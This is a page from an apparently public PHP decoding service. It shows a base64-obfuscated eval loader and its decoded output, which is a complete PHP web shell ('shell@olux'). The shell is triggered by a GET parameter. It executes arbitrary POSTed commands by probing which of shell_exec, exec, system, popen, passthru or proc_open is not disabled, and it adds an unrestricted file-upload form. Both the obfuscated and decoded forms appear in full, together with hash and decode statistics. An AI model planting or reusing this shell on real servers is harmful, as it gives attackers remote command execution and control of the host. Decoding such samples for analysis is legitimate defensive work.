Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('aWYgKCRfR0VUWydhcGknXSA9PSAib2x1eCIpIHsKCgllY2hvICc8aHRtbCBsYW5..

Decoded Output download

if ($_GET['api'] == "olux") {

	echo '<html lang="en">';
	echo '<body>';
	echo '<h2>shell@olux >_ </h2>';
	echo '<form method="post">';
	echo '<input type="text" name="cmd" id="cmd" value=""></input>';
	echo '<button type="submit">Execute</button>';
	echo '</form>';
	echo '</body>';
	echo '</html>';

	$retval = "";
	$cmd = "";


	if (!empty($_POST['cmd'])) {

		$funcs_all = array("shell_exec","exec","system","popen","passthru","proc_open");
		$funcs_str = ini_get('disable_functions');
		$funcs_str = str_replace(' ', '', $funcs_str);
		$funcs = explode(',',$funcs_str);

		foreach ( $funcs_all as $val ) {
			$exist = 0;	
			foreach ( $funcs as $val2 ) {
				if ( $val == $val2 ) { $exist = 1;}
			}
	
			if ( $exist == 0 ) {
				$func_hl = $val;
				break;
			}
		}


		switch ($func_hl) {
			case "shell_exec":
				$cmd = shell_exec($_POST['cmd']);
				$fp = fopen('output.txt','w');
				fwrite($fp,$cmd);
				fclose($fp);
				break;
			case "exec":
				exec($_POST['cmd'], $cmd, $retval);
				$fp = fopen('output.txt','w');
				foreach($cmd as $buff) {fwrite($fp,"$buff
");}
				fclose($fp);
				break;
			case "popen":
				$hdl = popen($_POST['cmd'],'r');
				$cmd = fread($hdl,1024000);
				$fp = fopen('output.txt','w');
				fwrite($fp,$cmd);
				pclose($hdl);
				fclose($fp);
				break;
			case "proc_open":
				$proc=proc_open($_POST['cmd'],array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$pipes);
				$fp = fopen('output.txt','w');
				$cmd = stream_get_contents($pipes[1]);
				fwrite($fp,$cmd);
				proc_close($proc);
				fclose($fp);
				break;
			case "system":
				system($_POST['cmd'], $retval);
				break;
			case "passthru":
				passthru($_POST['cmd'], $retval);
				break;
			default:
				echo "no function available";
		}
	}

        if ( !empty($cmd) ) {

		if ( file_exists('output.txt') ) {
		
			$fp = fopen('output.txt','r');
			while( !feof($fp) ) { echo fgets($fp) . "<br>"; }
			fclose($fp);
			unlink('output.txt');
		}
        }
        
        
	if(!isset($directory))
		$directory = '/';
	else { if(!preg_match('/.*\/$/', $directory)) { $directory .= '/'; } }
	
	if(preg_match('/^cd (.*)/', $command, $resbuf)) {
  		if(!preg_match('/^\/.*/', $resbuf[1])) { $directory .= $resbuf[1]; }
  		else { $directory = $resbuf[1]; }
	}

	if(isset($command))
	{
		echo '<pre><hr><xmp>';
		passthru("cd $directory; $command");
	}

	echo '<form enctype="multipart/form-data" action="" method="post">';
	echo '<input type="hidden" name="MAX_FILE_SIZE" value="1000000000">';
	echo '<input name="userfile" type="file" />';
	echo '<input name="submit" type="submit" value="Upload" />';
	echo '</form>';

	if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) {
		copy($_FILES["userfile"]["tmp_name"], "" . $_FILES["userfile"]["name"]);
		echo "<p>File Uploaded</p>";
	}

}

Did this file decode correctly?

Original Code

<?php
eval(base64_decode('aWYgKCRfR0VUWydhcGknXSA9PSAib2x1eCIpIHsKCgllY2hvICc8aHRtbCBsYW5nPSJlbiI+JzsKCWVjaG8gJzxib2R5Pic7CgllY2hvICc8aDI+c2hlbGxAb2x1eCA+XyA8L2gyPic7CgllY2hvICc8Zm9ybSBtZXRob2Q9InBvc3QiPic7CgllY2hvICc8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBpZD0iY21kIiB2YWx1ZT0iIj48L2lucHV0Pic7CgllY2hvICc8YnV0dG9uIHR5cGU9InN1Ym1pdCI+RXhlY3V0ZTwvYnV0dG9uPic7CgllY2hvICc8L2Zvcm0+JzsKCWVjaG8gJzwvYm9keT4nOwoJZWNobyAnPC9odG1sPic7CgoJJHJldHZhbCA9ICIiOwoJJGNtZCA9ICIiOwoKCglpZiAoIWVtcHR5KCRfUE9TVFsnY21kJ10pKSB7CgoJCSRmdW5jc19hbGwgPSBhcnJheSgic2hlbGxfZXhlYyIsImV4ZWMiLCJzeXN0ZW0iLCJwb3BlbiIsInBhc3N0aHJ1IiwicHJvY19vcGVuIik7CgkJJGZ1bmNzX3N0ciA9IGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CgkJJGZ1bmNzX3N0ciA9IHN0cl9yZXBsYWNlKCcgJywgJycsICRmdW5jc19zdHIpOwoJCSRmdW5jcyA9IGV4cGxvZGUoJywnLCRmdW5jc19zdHIpOwoKCQlmb3JlYWNoICggJGZ1bmNzX2FsbCBhcyAkdmFsICkgewoJCQkkZXhpc3QgPSAwOwkKCQkJZm9yZWFjaCAoICRmdW5jcyBhcyAkdmFsMiApIHsKCQkJCWlmICggJHZhbCA9PSAkdmFsMiApIHsgJGV4aXN0ID0gMTt9CgkJCX0KCQoJCQlpZiAoICRleGlzdCA9PSAwICkgewoJCQkJJGZ1bmNfaGwgPSAkdmFsOwoJCQkJYnJlYWs7CgkJCX0KCQl9CgoKCQlzd2l0Y2ggKCRmdW5jX2hsKSB7CgkJCWNhc2UgInNoZWxsX2V4ZWMiOgoJCQkJJGNtZCA9IHNoZWxsX2V4ZWMoJF9QT1NUWydjbWQnXSk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCWZ3cml0ZSgkZnAsJGNtZCk7CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJleGVjIjoKCQkJCWV4ZWMoJF9QT1NUWydjbWQnXSwgJGNtZCwgJHJldHZhbCk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCWZvcmVhY2goJGNtZCBhcyAkYnVmZikge2Z3cml0ZSgkZnAsIiRidWZmXG4iKTt9CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJwb3BlbiI6CgkJCQkkaGRsID0gcG9wZW4oJF9QT1NUWydjbWQnXSwncicpOwoJCQkJJGNtZCA9IGZyZWFkKCRoZGwsMTAyNDAwMCk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCWZ3cml0ZSgkZnAsJGNtZCk7CgkJCQlwY2xvc2UoJGhkbCk7CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJwcm9jX29wZW4iOgoJCQkJJHByb2M9cHJvY19vcGVuKCRfUE9TVFsnY21kJ10sYXJyYXkoYXJyYXkoInBpcGUiLCJyIiksYXJyYXkoInBpcGUiLCJ3IiksYXJyYXkoInBpcGUiLCJ3IikpLCRwaXBlcyk7CgkJCQkkZnAgPSBmb3Blbignb3V0cHV0LnR4dCcsJ3cnKTsKCQkJCSRjbWQgPSBzdHJlYW1fZ2V0X2NvbnRlbnRzKCRwaXBlc1sxXSk7CgkJCQlmd3JpdGUoJGZwLCRjbWQpOwoJCQkJcHJvY19jbG9zZSgkcHJvYyk7CgkJCQlmY2xvc2UoJGZwKTsKCQkJCWJyZWFrOwoJCQljYXNlICJzeXN0ZW0iOgoJCQkJc3lzdGVtKCRfUE9TVFsnY21kJ10sICRyZXR2YWwpOwoJCQkJYnJlYWs7CgkJCWNhc2UgInBhc3N0aHJ1IjoKCQkJCXBhc3N0aHJ1KCRfUE9TVFsnY21kJ10sICRyZXR2YWwpOwoJCQkJYnJlYWs7CgkJCWRlZmF1bHQ6CgkJCQllY2hvICJubyBmdW5jdGlvbiBhdmFpbGFibGUiOwoJCX0KCX0KCiAgICAgICAgaWYgKCAhZW1wdHkoJGNtZCkgKSB7CgoJCWlmICggZmlsZV9leGlzdHMoJ291dHB1dC50eHQnKSApIHsKCQkKCQkJJGZwID0gZm9wZW4oJ291dHB1dC50eHQnLCdyJyk7CgkJCXdoaWxlKCAhZmVvZigkZnApICkgeyBlY2hvIGZnZXRzKCRmcCkgLiAiPGJyPiI7IH0KCQkJZmNsb3NlKCRmcCk7CgkJCXVubGluaygnb3V0cHV0LnR4dCcpOwoJCX0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCglpZighaXNzZXQoJGRpcmVjdG9yeSkpCgkJJGRpcmVjdG9yeSA9ICcvJzsKCWVsc2UgeyBpZighcHJlZ19tYXRjaCgnLy4qXC8kLycsICRkaXJlY3RvcnkpKSB7ICRkaXJlY3RvcnkgLj0gJy8nOyB9IH0KCQoJaWYocHJlZ19tYXRjaCgnL15jZCAoLiopLycsICRjb21tYW5kLCAkcmVzYnVmKSkgewogIAkJaWYoIXByZWdfbWF0Y2goJy9eXC8uKi8nLCAkcmVzYnVmWzFdKSkgeyAkZGlyZWN0b3J5IC49ICRyZXNidWZbMV07IH0KICAJCWVsc2UgeyAkZGlyZWN0b3J5ID0gJHJlc2J1ZlsxXTsgfQoJfQoKCWlmKGlzc2V0KCRjb21tYW5kKSkKCXsKCQllY2hvICc8cHJlPjxocj48eG1wPic7CgkJcGFzc3RocnUoImNkICRkaXJlY3Rvcnk7ICRjb21tYW5kIik7Cgl9CgoJZWNobyAnPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+JzsKCWVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Ik1BWF9GSUxFX1NJWkUiIHZhbHVlPSIxMDAwMDAwMDAwIj4nOwoJZWNobyAnPGlucHV0IG5hbWU9InVzZXJmaWxlIiB0eXBlPSJmaWxlIiAvPic7CgllY2hvICc8aW5wdXQgbmFtZT0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+JzsKCWVjaG8gJzwvZm9ybT4nOwoKCWlmIChAaXNfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJ1c2VyZmlsZSJdWyJ0bXBfbmFtZSJdKSkgewoJCWNvcHkoJF9GSUxFU1sidXNlcmZpbGUiXVsidG1wX25hbWUiXSwgIiIgLiAkX0ZJTEVTWyJ1c2VyZmlsZSJdWyJuYW1lIl0pOwoJCWVjaG8gIjxwPkZpbGUgVXBsb2FkZWQ8L3A+IjsKCX0KCn0='));
?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 2ee5115c6e8fc34b2dfc0a0b5b37458e
Eval Count 1
Decode Time 58 ms